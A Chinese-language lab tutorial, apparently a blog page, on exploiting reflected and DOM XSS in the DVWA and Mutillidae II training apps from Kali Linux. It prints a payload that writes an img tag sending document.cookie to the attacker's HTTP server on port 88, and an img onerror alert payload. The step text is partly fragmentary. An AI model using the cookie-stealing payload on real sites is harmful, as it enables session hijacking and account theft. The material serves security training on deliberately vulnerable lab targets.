赞
踩
目录
1.在 Kali Linux 的终端上运行以下命令来开启 HTTP 服务:python -m http.server 88(打开服务器)
2.使用 admin作为账号和密码,登录DWVA,并转到XSS reflection:
2.1登录DWAV,先点击Damn Vulnerable Web Application
3. 在文本框中输入以下内容(___处填上 Kali 主机 IP 地址):
2.浏览器登入靶机IP,转到 Mutillidae II | OWASP 2013 | XSS | DOM | HTML5 Storage
1.这个练习会展示一个表单,用于在浏览器的本地记录中存储信息和相应的
2.尝试添加一些数据,发现在开发者工具中并没有进行网络通信,绿色条显示
3. 如果检查"Add New"按钮,看到它在单击时调用了一个函数 addItemToStorage:
4.现在,转到 Debugger 选项卡并查找 addItemToStorage 函数, 在 index.php 的第1064 行找到了这个函数: 编辑
5.尝试设置一个包含 HTML 代码的键值。添加以下键作为键的新值:
6.如果浏览器解释 HTML 代码,则很可能也会出现 JavaScript 块。添加一个新
如果目标站点存在 XSS 漏洞并且 Cookie 并没有开启 http-only 的话,那么它们二者将是 Web 安全的巨大隐患。利用 XSS 攻击 Cookie 是一定需要一个服务器的,下面我们一起学习如何使用 XSS 来获取用户的 cookie。
Bob<script>document.write('<img src="http://___:88/'+document.cookie+'">');</script>
(使用img图片标签,在图片地址src写入了获取cookie的指令,由于无法从src获取到图片,就会报错,报错信息中包含Cookie)
192.168.17.131
利用DOM XSS攻击时,payload 是由浏览器的 DOM 接收和处理的,这意味着注入的代码永远不会在服务器端运行,并且任何服务器端验证或编码都对这种攻击无效。
Cookbook test <img src = X onerror ="alert('DOM XSS')">
(使用img标签,弹出弹窗)
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。